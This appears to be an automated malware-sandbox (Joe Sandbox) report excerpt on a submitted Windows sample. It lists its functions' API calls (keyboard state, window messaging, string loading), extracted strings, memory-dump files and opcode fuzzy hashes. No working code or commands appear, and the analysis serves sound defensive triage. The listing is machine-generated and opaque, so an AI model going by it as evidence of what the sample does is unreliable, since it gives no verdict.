                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetParent.USER32 ref: 00445BF8
                                                                          • GetClassNameW.USER32(00000000,?,00000100), ref: 00445C0D
                                                                          • __wcsicoll.LIBCMT ref: 00445C33
                                                                          • __wcsicoll.LIBCMT ref: 00445C4F
                                                                          • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445CA9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: __wcsicoll$ClassMessageNameParentSend
                                                                          • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                          • API String ID: 3125838495-3381328864
                                                                          • Opcode ID: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                                                          • Instruction ID: b9a51c7f116d0e73852bd225d20f6d8bcb5f39b8f57bd3164038c04ed7d94027
                                                                          • Opcode Fuzzy Hash: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                                                          • Instruction Fuzzy Hash: C6110AB1E447017BFE10BA659D46EBB339C9B54B11F00051BFE44D7242F6ACA94147A9
                                                                          Function 004491B9 Relevance: 19.7, APIs: 13, Instructions: 246windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SendMessageW.USER32(?,?,000000FF,?), ref: 004492A4
                                                                          • SendMessageW.USER32(?,?,00000000,00000000), ref: 004492B7
                                                                          • CharNextW.USER32(?,?,?,000000FF,?), ref: 004492E9
                                                                          • SendMessageW.USER32(?,?,00000000,00000000), ref: 00449301
                                                                          • SendMessageW.USER32(?,?,00000000,?), ref: 00449332
                                                                          • SendMessageW.USER32(?,?,000000FF,?), ref: 00449349
                                                                          • SendMessageW.USER32(?,?,00000000,00000000), ref: 0044935C
                                                                          • SendMessageW.USER32(?,00000402,?), ref: 00449399
                                                                          • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0044940D
                                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$CharNext
                                                                          • String ID:
                                                                          • API String ID: 1350042424-0
                                                                          • Opcode ID: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                                                          • Instruction ID: 867fdc7b80e212b75fe5daf06e5219747a853435bb2a874e280223eddbea68d3
                                                                          • Opcode Fuzzy Hash: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                                                          • Instruction Fuzzy Hash: 5B81D535A00119BBEB10CF85DD80FFFB778FB55720F10825AFA14AA280D7B99D4197A4
                                                                          Function 00478656 Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 197COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                                                            • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                                                          • GetDriveTypeW.KERNEL32(?), ref: 004787B9
                                                                          • _wcscpy.LIBCMT ref: 004787E5
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: BuffCharDriveLowerType_wcscpy_wcslen
                                                                          • String ID: \VH$a$all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                          • API String ID: 3052893215-2127371420
                                                                          • Opcode ID: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                                                          • Instruction ID: 541bc2b2506c052d744bcb7e7e177e26c036821b53f5a58429f0f0853ea8de24
                                                                          • Opcode Fuzzy Hash: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                                                          • Instruction Fuzzy Hash: 4761C1716443018BD700EF14CC85B9BB7D4AB84348F14892FF949AB382DB79E94987AB
                                                                          Function 0045E737 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 163COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E77F
                                                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                          • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E7A0
                                                                          • __swprintf.LIBCMT ref: 0045E7F7
                                                                          • _wprintf.LIBCMT ref: 0045E8B3
                                                                          • _wprintf.LIBCMT ref: 0045E8D7
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                                                          • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                          • API String ID: 2295938435-2354261254
                                                                          • Opcode ID: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                                                          • Instruction ID: 453f5dd12ee62c270a242db3517b58e8b6225e49c0ff470bc5072f32437c925c
                                                                          • Opcode Fuzzy Hash: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                                                          • Instruction Fuzzy Hash: 6A519E71A10219ABDB14EB91CC85EEF7778AF44314F14407EF90477292DB78AE49CBA8
                                                                          Function 004531B1 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 160COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: __swprintf_wcscpy$__i64tow__itow
                                                                          • String ID: %.15g$0x%p$False$True
                                                                          • API String ID: 3038501623-2263619337
                                                                          • Opcode ID: dbd07ee36d68efbdb82b47f6bbdb5a558a403895529f1bd62c5843a789ef215e
                                                                          • Instruction ID: fd507a47f7d2c8f7f5848ea17d112ce969af4838d766d220e6d3988dad71e25c
                                                                          • Opcode Fuzzy Hash: dbd07ee36d68efbdb82b47f6bbdb5a558a403895529f1bd62c5843a789ef215e
                                                                          • Instruction Fuzzy Hash: 264108729001005BDB10EF75DC42FAAB364EF55306F0445ABFE09CB242EA39DA48C79A
                                                                          Function 0045E538 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 154COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E580
                                                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                          • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E59F
                                                                          • __swprintf.LIBCMT ref: 0045E5F6
                                                                          • _wprintf.LIBCMT ref: 0045E6A3
                                                                          • _wprintf.LIBCMT ref: 0045E6C7
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                                                          • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                          • API String ID: 2295938435-8599901
                                                                          • Opcode ID: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                                                                          • Instruction ID: ff3e2b23dced8a629e5b21f12e79e468b5cd48208a3d74017576322ff0354a8f
                                                                          • Opcode Fuzzy Hash: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                                                                          • Instruction Fuzzy Hash: 9A519171D00109ABDB14EBA1C845EEF7778EF44304F50847EF91477292EA78AE49CBA8
                                                                          Function 00443B61 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 99sleepwindowtimeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • timeGetTime.WINMM ref: 00443B67
                                                                            • Part of subcall function 0040C620: timeGetTime.WINMM(0042DD5D), ref: 0040C620
                                                                          • Sleep.KERNEL32(0000000A), ref: 00443B9F
                                                                          • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00443BC8
                                                                          • SetActiveWindow.USER32(?), ref: 00443BEC
                                                                          • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00443BFC
                                                                          • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00443C22
                                                                          • Sleep.KERNEL32(000000FA), ref: 00443C2D
                                                                          • IsWindow.USER32(?), ref: 00443C3A
                                                                          • EndDialog.USER32(?,00000000), ref: 00443C4C
                                                                            • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                                                            • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                                                            • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                                                          • EnumThreadWindows.USER32(00000000,Function_00033D09,00000000), ref: 00443C6B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: ThreadWindow$MessageSendSleepTimetime$ActiveAttachCurrentDialogEnumFindInputProcessWindows
                                                                          • String ID: BUTTON
                                                                          • API String ID: 1834419854-3405671355
                                                                          • Opcode ID: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                                                          • Instruction ID: 3c6370bb7d17ad47abda0b7088cfd3672c19e1ca6c3f529de1b12449ce3ad6f8
                                                                          • Opcode Fuzzy Hash: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                                                          • Instruction Fuzzy Hash: 6B31E676784200BFE3349F74FD99F5A3B58AB55B22F10083AF600EA2A1D6B5A441876C
                                                                          Function 00454014 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 93windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,?,?,0042820D,?,?,?,#include depth exceeded. Make sure there are no recursive includes,?), ref: 00454039
                                                                          • LoadStringW.USER32(00000000), ref: 00454040
                                                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                          • _wprintf.LIBCMT ref: 00454074
                                                                          • __swprintf.LIBCMT ref: 004540A3
                                                                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0045410F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: HandleLoadMessageModuleString__swprintf_memmove_wcslen_wprintf
                                                                          • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                          • API String ID: 455036304-4153970271
                                                                          • Opcode ID: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                                                          • Instruction ID: e2f14448b15a7dab571624068eda089460c560eca1c8ebe4dd0daaccfe0aa2c5
                                                                          • Opcode Fuzzy Hash: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                                                          • Instruction Fuzzy Hash: 3B31E872B0011997CB00EF95CD069AE3378AF88714F50445EFA0877282D678AE45C7A9
                                                                          Function 00467C8E Relevance: 18.3, APIs: 12, Instructions: 310COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467D63
                                                                          • SafeArrayAccessData.OLEAUT32(0000007F,0000007F), ref: 00467DDC
                                                                          • SafeArrayGetVartype.OLEAUT32(0000007F,?), ref: 00467E71
                                                                          • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00467E9D
                                                                          • _memmove.LIBCMT ref: 00467EB8
                                                                          • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00467EC1
                                                                          • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467EDE
                                                                          • _memmove.LIBCMT ref: 00467F6C
                                                                          • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467FC1
                                                                          • SafeArrayUnaccessData.OLEAUT32(00000004), ref: 00467FAB
                                                                            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                            • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                          • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00467E48
                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                          • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00468030
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: ArraySafe$Data$Access$Unaccess$_memmovestd::exception::exception$Exception@8ThrowVartype_malloc
                                                                          • String ID:
                                                                          • API String ID: 2170234536-0
                                                                          • Opcode ID: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                                                                          • Instruction ID: 6369f5c3f22445f0d5bf5c4520e4337682cbd46778e63a39b460943b9460954a
                                                                          • Opcode Fuzzy Hash: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                                                                          • Instruction Fuzzy Hash: 26B124716042059FD700CF59D884BAEB7B5FF88308F24856EEA05DB351EB3AD845CB6A
                                                                          Function 00453C57 Relevance: 18.2, APIs: 12, Instructions: 190keyboardCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetKeyboardState.USER32(?), ref: 00453CE0
                                                                          • SetKeyboardState.USER32(?), ref: 00453D3B
                                                                          • GetAsyncKeyState.USER32(000000A0), ref: 00453D5E
                                                                          • GetKeyState.USER32(000000A0), ref: 00453D75
                                                                          • GetAsyncKeyState.USER32(000000A1), ref: 00453DA4
                                                                          • GetKeyState.USER32(000000A1), ref: 00453DB5
                                                                          • GetAsyncKeyState.USER32(00000011), ref: 00453DE1
                                                                          • GetKeyState.USER32(00000011), ref: 00453DEF
                                                                          • GetAsyncKeyState.USER32(00000012), ref: 00453E18
                                                                          • GetKeyState.USER32(00000012), ref: 00453E26
                                                                          • GetAsyncKeyState.USER32(0000005B), ref: 00453E4F
                                                                          • GetKeyState.USER32(0000005B), ref: 00453E5D
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: State$Async$Keyboard
                                                                          • String ID:
                                                                          • API String ID: 541375521-0
                                                                          • Opcode ID: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                                                          • Instruction ID: 009fbf1908f75ed0a62addf5985db529f64a747a45b1090b1102dc3b9208550d
                                                                          • Opcode Fuzzy Hash: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                                                          • Instruction Fuzzy Hash: BC61DD3190478829FB329F6488057EBBBF45F12346F08459ED9C2162C3D7AC6B4CCB65
                                                                          Function 004357B7 Relevance: 18.2, APIs: 12, Instructions: 184COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetDlgItem.USER32(?,00000001), ref: 004357DB
                                                                          • GetWindowRect.USER32(00000000,?), ref: 004357ED
                                                                          • MoveWindow.USER32(?,0000000A,?,?,?,00000000), ref: 00435857
                                                                          • GetDlgItem.USER32(?,00000002), ref: 0043586A
                                                                          • GetWindowRect.USER32(00000000,?), ref: 0043587C
                                                                          • MoveWindow.USER32(?,?,00000000,?,00000001,00000000), ref: 004358CE
                                                                          • GetDlgItem.USER32(?,000003E9), ref: 004358DC
                                                                          • GetWindowRect.USER32(00000000,?), ref: 004358EE
                                                                          • MoveWindow.USER32(?,0000000A,00000000,?,?,00000000), ref: 00435933
                                                                          • GetDlgItem.USER32(?,000003EA), ref: 00435941
                                                                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 0043595A
                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00435967
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Window$ItemMoveRect$Invalidate
                                                                          • String ID:
                                                                          • API String ID: 3096461208-0
                                                                          • Opcode ID: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                                                          • Instruction ID: 6af1b44a8b8b1dd3dfd8c00d901dfbe31295268d39f582813a56aed3f3dd18d2
                                                                          • Opcode Fuzzy Hash: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                                                          • Instruction Fuzzy Hash: 7C515FB1B00609ABCB18DF68CD95AAEB7B9EF88310F148529F905E7390E774ED008B54
                                                                          Function 004714D9 Relevance: 18.1, APIs: 12, Instructions: 132windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 004714DC
                                                                          • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 004714F7
                                                                          • SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 00471510
                                                                          • DeleteObject.GDI32(?), ref: 0047151E
                                                                          • DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,000000F0), ref: 0047152C
                                                                          • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0047156F
                                                                          • SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 00471588
                                                                          • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004715A9
                                                                          • DestroyIcon.USER32(?,?,?,?,?,?,000000F0), ref: 004715CD
                                                                          • SendMessageW.USER32(?,000000F7,00000001,?), ref: 004715DC
                                                                          • DeleteObject.GDI32(?), ref: 004715EA
                                                                          • DestroyIcon.USER32(?,?,000000F7,00000001,?,?,?,?,?,?,000000F0), ref: 004715F8
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
